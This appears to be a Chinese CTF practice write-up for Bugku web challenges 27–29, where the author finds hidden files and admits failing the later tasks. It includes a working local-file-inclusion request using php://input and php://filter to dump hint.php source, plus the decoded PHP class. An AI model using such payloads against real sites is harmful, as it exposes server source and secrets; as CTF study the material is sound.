27、查看源代码,发现提示:
<!–1p.html–>那就去1p.html看看,但是发现回到了CTF社区的首页。
再抓个包看看发生了什么:
发现一段base64,解密后还是一段url编码,再解码后得到一段代码:
里面提到一个文件:f4l2a3g.txt,访问之,直接得到flag。
28、查看源码,发现一堆代码,意思就是有个user变量接收一个txt变量,这个txt变量是必须是一个文件??而且内容是welcome to the bugkuctf,如果这个条件成立,就可以加载包含flag的文件了。可以利用php://input和post在做到。
然后我们就有hint.php这个文件了,但是怎么访问呢??抓包似乎没用。。
这时候想到第18题的那个php://filter 协议,用它构造:
120.24.86.145:8006/test1/index.php?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php
果然得到了一串base64:
PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==
解码得:
<?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>
然后这只是一个flag类??接下来就不会了。。。
28、这个题挂了。。。然而不挂估计也不会做。。。
29、这个,,对不起又陷入知识盲区了,容我先学学,一定补上。
似乎就做出来一道题,惭愧惭愧。。。